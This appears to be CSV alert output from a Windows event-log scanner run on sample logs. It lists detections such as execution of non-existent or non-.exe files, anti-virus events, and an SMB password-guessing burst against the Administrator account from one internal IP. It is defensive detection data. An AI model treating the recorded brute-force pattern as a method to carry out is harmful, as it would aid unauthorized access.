2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc  :  Type: 3  :  Workstation: 6hgtmVlrrFuWtO65  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000064  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gC4ymsKbxVGScMgY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2q1tdAUlxHGfGH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3EPNzcwy7tOAADWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AbwsMP10Rs4h1Wl1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EEcdqcpqsxQ4RgPx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngdtRwzXXhAlRxGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BbCFZw5qQgU7rQ9W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SXr7lA3MkV6xK36f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tVFs1kR0AuOutnuI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PkeEabFrDLsBVcXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GH7dTevmTKZo46Tq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l2E8JmrfaCj5AjSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N4FLUvawWPVqdLaD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KN0EeUzxSZy5l7J4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8FjH0QHqromIYWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fhlF37S1wNupiX5O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j19XhmSXK526I8kf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IRcppJXDNNfKuvdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0FoGAIAK2FV3zCJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uYWIk76XIksgN3sE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3FEop7o3SOolNvKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMGEM3ql9uov7zCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EFPUA4pUPaLrkr1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7IeJU89jxitz407  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wqj9nXRaDpwCJZO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bl0d61v2Ux7cNv4r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LxTa5lyutrIB2cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPCy11e3YxcCloSH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mj07WKc4aQqPC0Te  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2M3v4TsQul5R4sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I67uBcH52tgLzhVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hsth68FDJ4F10H6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
